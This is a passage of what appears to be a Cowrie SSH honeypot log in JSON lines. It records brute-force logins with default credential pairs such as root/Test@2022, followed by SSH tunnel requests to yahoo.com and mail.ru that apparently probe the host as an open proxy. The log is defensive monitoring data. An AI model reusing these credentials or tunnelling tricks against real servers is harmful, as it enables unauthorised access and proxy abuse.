{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":8253,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:8253","sensor":"my-vps","timestamp":"2025-08-31T03:47:51.832298Z","session":"73a8821c7750"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:51.882425Z","src_ip":"77.83.207.83","session":"73a8821c7750"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":18943,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:18943","sensor":"my-vps","timestamp":"2025-08-31T03:47:52.024567Z","session":"73a8821c7750"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:52.075148Z","src_ip":"77.83.207.83","session":"73a8821c7750"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:52.126194Z","src_ip":"77.83.207.83","session":"73a8821c7750"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":63853,"dst_ip":"1.2.3.4","dst_port":22,"session":"7f0a7a8a7e8e","protocol":"ssh","message":"New connection: 77.83.207.83:63853 (1.2.3.4:22) [session: 7f0a7a8a7e8e]","sensor":"my-vps","timestamp":"2025-08-31T03:47:52.175911Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:52.185795Z","src_ip":"77.83.207.83","session":"7f0a7a8a7e8e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:52.227478Z","src_ip":"77.83.207.83","session":"7f0a7a8a7e8e"}
{"eventid":"cowrie.login.failed","username":"test","password":"password1","message":"login attempt [test/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T03:47:52.311696Z","src_ip":"212.227.235.229","session":"1a34867f8226"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:52.482994Z","src_ip":"77.83.207.83","session":"7f0a7a8a7e8e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":26603,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:26603","sensor":"my-vps","timestamp":"2025-08-31T03:47:52.535001Z","session":"7f0a7a8a7e8e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:52.586907Z","src_ip":"77.83.207.83","session":"7f0a7a8a7e8e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":21655,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:21655","sensor":"my-vps","timestamp":"2025-08-31T03:47:52.729519Z","session":"7f0a7a8a7e8e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:52.780704Z","src_ip":"77.83.207.83","session":"7f0a7a8a7e8e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":19880,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:19880","sensor":"my-vps","timestamp":"2025-08-31T03:47:52.925571Z","session":"7f0a7a8a7e8e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:52.976726Z","src_ip":"77.83.207.83","session":"7f0a7a8a7e8e"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:53.028656Z","src_ip":"77.83.207.83","session":"7f0a7a8a7e8e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":63931,"dst_ip":"1.2.3.4","dst_port":22,"session":"80c12d66128d","protocol":"ssh","message":"New connection: 77.83.207.83:63931 (1.2.3.4:22) [session: 80c12d66128d]","sensor":"my-vps","timestamp":"2025-08-31T03:47:53.077572Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:53.087388Z","src_ip":"77.83.207.83","session":"80c12d66128d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:53.128008Z","src_ip":"77.83.207.83","session":"80c12d66128d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:53.377429Z","src_ip":"77.83.207.83","session":"80c12d66128d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":7890,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:7890","sensor":"my-vps","timestamp":"2025-08-31T03:47:53.428257Z","session":"80c12d66128d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:53.478418Z","src_ip":"77.83.207.83","session":"80c12d66128d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":14860,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:14860","sensor":"my-vps","timestamp":"2025-08-31T03:47:53.620218Z","session":"80c12d66128d"}
{"eventid":"cowrie.login.failed","username":"master","password":"123456","message":"login attempt [master/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:47:53.621423Z","src_ip":"212.227.235.229","session":"b8e9fbe70648"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:53.635147Z","src_ip":"212.227.235.229","session":"1a34867f8226"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:53.670187Z","src_ip":"77.83.207.83","session":"80c12d66128d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":20009,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:20009","sensor":"my-vps","timestamp":"2025-08-31T03:47:53.812377Z","session":"80c12d66128d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:53.862365Z","src_ip":"77.83.207.83","session":"80c12d66128d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:53.913265Z","src_ip":"77.83.207.83","session":"80c12d66128d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":64027,"dst_ip":"1.2.3.4","dst_port":22,"session":"2414ff95da0a","protocol":"ssh","message":"New connection: 77.83.207.83:64027 (1.2.3.4:22) [session: 2414ff95da0a]","sensor":"my-vps","timestamp":"2025-08-31T03:47:53.962398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:53.972242Z","src_ip":"77.83.207.83","session":"2414ff95da0a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:54.012843Z","src_ip":"77.83.207.83","session":"2414ff95da0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50816,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd5f49b6856c","protocol":"ssh","message":"New connection: 212.227.235.229:50816 (1.2.3.4:22) [session: bd5f49b6856c]","sensor":"my-vps","timestamp":"2025-08-31T03:47:54.223867Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:54.262249Z","src_ip":"77.83.207.83","session":"2414ff95da0a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":14198,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:14198","sensor":"my-vps","timestamp":"2025-08-31T03:47:54.313061Z","session":"2414ff95da0a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:54.363108Z","src_ip":"77.83.207.83","session":"2414ff95da0a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":16909,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:16909","sensor":"my-vps","timestamp":"2025-08-31T03:47:54.504330Z","session":"2414ff95da0a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:54.554296Z","src_ip":"77.83.207.83","session":"2414ff95da0a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":13310,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:13310","sensor":"my-vps","timestamp":"2025-08-31T03:47:54.696319Z","session":"2414ff95da0a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:54.746407Z","src_ip":"77.83.207.83","session":"2414ff95da0a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:54.797443Z","src_ip":"77.83.207.83","session":"2414ff95da0a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":64097,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7e7d64fa6b9","protocol":"ssh","message":"New connection: 77.83.207.83:64097 (1.2.3.4:22) [session: b7e7d64fa6b9]","sensor":"my-vps","timestamp":"2025-08-31T03:47:54.845979Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:54.846960Z","src_ip":"77.83.207.83","session":"b7e7d64fa6b9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:47:54.896648Z","src_ip":"77.83.207.83","session":"b7e7d64fa6b9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:47:55.144942Z","src_ip":"77.83.207.83","session":"b7e7d64fa6b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1404,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:1404","sensor":"my-vps","timestamp":"2025-08-31T03:47:55.196462Z","session":"b7e7d64fa6b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:55.246349Z","src_ip":"77.83.207.83","session":"b7e7d64fa6b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":8107,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:8107","sensor":"my-vps","timestamp":"2025-08-31T03:47:55.388382Z","session":"b7e7d64fa6b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:55.438197Z","src_ip":"77.83.207.83","session":"b7e7d64fa6b9"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:55.477151Z","src_ip":"212.227.235.229","session":"b8e9fbe70648"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":32465,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:32465","sensor":"my-vps","timestamp":"2025-08-31T03:47:55.580304Z","session":"b7e7d64fa6b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:47:55.630104Z","src_ip":"77.83.207.83","session":"b7e7d64fa6b9"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:47:55.680775Z","src_ip":"77.83.207.83","session":"b7e7d64fa6b9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":64176,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f47cef8f492","protocol":"ssh","message":"New connection: 77.83.207.83:64176 (1.2.3.4:22) [session: 5f47cef8f492]","sensor":"my-vps","timestamp":"2025-08-31T03:47:55.733093Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:47:55.734174Z","src_ip":"77.83.207.83","session":"5f47cef8f492"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-st